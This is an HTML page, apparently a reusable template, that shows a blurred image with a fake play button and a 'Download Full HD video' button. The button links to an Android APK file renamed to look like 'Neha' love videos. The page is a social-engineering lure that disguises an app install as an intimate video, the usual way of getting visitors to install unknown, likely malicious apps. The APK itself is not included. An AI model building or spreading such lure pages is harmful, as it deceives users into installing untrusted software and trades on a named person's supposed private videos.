<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <style>
        .container {
            position: relative;
            width: 90%;
            margin: 20px auto;
        }
        .image {
            width: 95%;
            display: block;
            filter: blur(5px);
        }
        .play-button {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: rgba(255, 255, 255, 0.7); /* Semi-transparent background */
            border: none;
            border-radius: 50%;
            width: 60px;
            height: 60px;
            display: flex;
            align-items: center;
            justify-content: center;
            cursor: pointer;
        }
        .play-button i {
            font-size: 24px; /* Icon size */
            color: DodgerBlue; /* Icon color */
        }
        .btn {
            margin-top: 20px;
            background-color: DodgerBlue;
            border: none;
            color: white;
            padding: 12px 30px;
            cursor: pointer;
            font-size: 20px;
            width: 100%;
        }
        .btn:hover {
            background-color: RoyalBlue;
        }
    </style>
</head>
<body>
    
    <a href="neha-love-videos.apk" download="Neha Full HD video">
        <button class="btn"><i class="fa fa-download"></i> Download Full HD video</button>
    </a>
    <div class="container">
        <img src="your-image-url.jpeg" alt="Play Video" class="image">
        <button class="play-button"><i class="fa fa-play"></i></button>
    </div>
</body>
</html>
